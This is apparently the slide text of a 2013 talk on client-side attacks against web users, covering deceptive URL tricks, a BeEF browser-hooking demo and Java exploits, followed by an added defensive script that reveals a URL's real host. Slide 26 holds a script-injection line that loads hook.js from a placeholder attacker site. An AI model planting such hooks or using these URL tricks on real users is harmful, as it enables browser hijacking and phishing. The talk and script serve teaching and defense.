Welcome to the world of hacking

This presentation was prepared specially for IT Weekend Lviv, October 2013, and covers Client Side Attacks against web users.

  • http://www.pcworld.com/article/2030086/cybercriminals-using-digitally-signed-java-exploits-to-trick-users.html
  • Zitmo and Zeus bank trojan

    1. Welcome to the world of HACKING by Nazar Tymoshyk, R&D team, SoftServe & Bohdan Serednyskyj, R&D team, SoftServe
    2. What is this topic about?
    3. How my friends see it. What my mom thinks. How the government sees it. How I imagine it myself. How society perceives it. And what it really is.
    4. This is an educational topic, not a motivational one
    5. Amateurs hack systems, professionals hack PEOPLE. Client Side Attacks
    6. About me
    7. Feel free to ask me anything :)
    8. Best SoftServe Team – R&D
    9. Security Team. Nazar Tymoshyk: CEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS, NAI, CLP, NLTS, CNA, NCLA, MCTS. Bohdan Serednytskyi: CEH, MSTC Security, ZSS
    10. Certifications: Identity & Security, Ph.D. in Security. SoftServe experts are certified in the HP Fortify Security Testing solution
    11. Time for fun. Just relax
    12. Target – web users
    13. Everybody knows that the Government is spying on us
    14. Every day we are getting suspicious emails
    15. And online promotions: Yes!!! Just click the link below
    16. Quick Quiz. 1. Will this URL work in IE? http:\\example.com 2. What page will be opened in the Firefox browser after entering this URL? http://example.com\@coredump.cx/ Answers: 1. Yes. IE and most browsers parse “\” as “/” for usability reasons. 2. In Firefox, that URL will take the user to coredump.cx, because “example.com\” will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.
    17. Now try it yourself and answer: what do you get?!
    18. Tricky URLs. For all browsers: http://example.com&gibberish=1234@167772161/ And http://example.com\@coredump.cx/ is http://example.com/ for all…
    19. This is it! For all browsers http://example.com&gibberish=1234@167772161/ is http://10.0.0.1/ And http://example.com\@coredump.cx/ is http://example.com/ for all… …but for Firefox it’s http://coredump.cx/
    20. Cheaters: http://example.com/.wholesomedomain.com/ This only looks like a real slash. Read: Evgeniy Gabrilovich and Alex Gontmakher, “The Homograph Attack”
    21. Server addresses
       • http://127.0.0.1/ This is the canonical representation of an IPv4 address.
       • http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number for the first octet and concatenates all the remaining octets into a single decimal value.
       • http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single
    22. Now attention
    23. Recommended Book
    24. DEMO I
    25. BeEF – Browser Exploitation Framework
    26. Our victim site http://192.168.241.240:8882 <script src=http://attackersite/hook.js></script>
    27. Now about Java
    28. Everybody likes Java
    29. But there is a small problem in 2013
    30. Java exploits in Metasploit 4. Status – Excellent
    31. JVM vulnerabilities
    32. DEMO II
    33. Social Engineering Toolkit
    34. Consequences
       • Stolen developer cloud access certificates
       • Malware and spyware on PC and mobile
       • Key loggers
       • Money lost – PayPal, WebMoney, etc.
       • Email – recovery and stolen accounts
       • SHAME!
    35. Recommendations
       • Up-to-date Java and all other software
       • Antivirus – Kaspersky rocks!
       • Encrypted keys to infrastructure
       • 2-factor authentication everywhere (email first)
       • Verify yourself and your browser on …
       • Attention
    36. OWASP Secure Coding Guide
    37. Apache Shiro
    38. OWASP WebGoat, DVWA. Train yourself in Security
    39. Hope you like it!
    40. Now ask! Email: root.nt@gmail.com Skype: root_nt Thank You! Copyright © 2013 SoftServe, Inc.
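The URL tricks on slides 16 to 21 (login data smuggled in before `@`, a backslash standing in for a slash, and the same IPv4 address written in decimal, hex or octal shorthand) are exactly what a URL filter, a proxy allow-list or a log-review script has to see through. The following is an added example written for this page, not code from the slides or from SoftServe: it resolves a URL to the host a browser would actually contact and flags the suspicious patterns. It assumes the modern WHATWG rule that a backslash equals a slash in http/https URLs (the behaviour the slides attribute to IE and "almost all other browsers"; the old Firefox case on slide 19 is the exception), and the function names `canonical_ipv4` and `effective_host` are this example's own.

```python
"""Resolve the host a browser would really connect to for a URL, so that a
filter or log-review script is not fooled by userinfo before '@', backslashes
used as slashes, or IPv4 addresses in decimal/hex/octal shorthand."""
import ipaddress
from urllib.parse import urlsplit


def _inet_aton_part(part: str) -> int:
    """One label of a numeric host under the classic inet_aton rules:
    '0x' prefix = hexadecimal, leading '0' = octal, otherwise decimal."""
    low = part.lower()
    if low.startswith("0x"):
        return int(low[2:], 16) if len(low) > 2 else 0
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str):
    """Dotted-quad form of a numeric IPv4 host written in any inet_aton
    shorthand (a / a.b / a.b.c / a.b.c.d, each part hex, octal or decimal),
    or None when the host is not such an address."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_inet_aton_part(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    if any(not 0 <= v <= 255 for v in head):
        return None
    remaining = 4 - len(head)          # bytes the last part has to fill
    if not 0 <= last < 256 ** remaining:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(n))


def effective_host(url: str) -> dict:
    """Where a modern browser would actually connect for `url`.

    Backslashes are treated as slashes (WHATWG rule for http/https; the
    historical Firefox behaviour that kept '\\' inside the authority is the
    exception the slides show). Everything before the last '@' in the
    authority is login data, not the host."""
    s = urlsplit(url.replace("\\", "/"))
    host = s.hostname or ""
    canon = canonical_ipv4(host)
    warnings = []
    if s.username is not None:
        warnings.append("userinfo before '@' (real host comes after it)")
    if canon is not None and canon != host:
        warnings.append("numeric host in non-canonical form")
    if not host.isascii():
        warnings.append("non-ASCII characters in host (possible homograph)")
    return {
        "host": host,
        "canonical_host": canon or host,
        "userinfo": s.username,
        "warnings": warnings,
    }


if __name__ == "__main__":
    # Constructed samples: the URLs shown on the slides.
    for u in [
        "http:\\\\example.com",
        "http://example.com\\@coredump.cx/",
        "http://example.com&gibberish=1234@167772161/",
        "http://0x7f.1/",
        "http://017700000001/",
    ]:
        r = effective_host(u)
        print(f"{u:48} -> {r['canonical_host']}  {r['warnings']}")
```

Run it as a script to see each slide URL reduced to its real destination: the `@` trick on slide 18 resolves to `10.0.0.1` with a warning about the userinfo, and the hex and octal forms on slide 21 both come out as `127.0.0.1`. The warnings list is what a defender would alert on; the canonical host is what should be compared against an allow-list or block-list, never the raw string.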
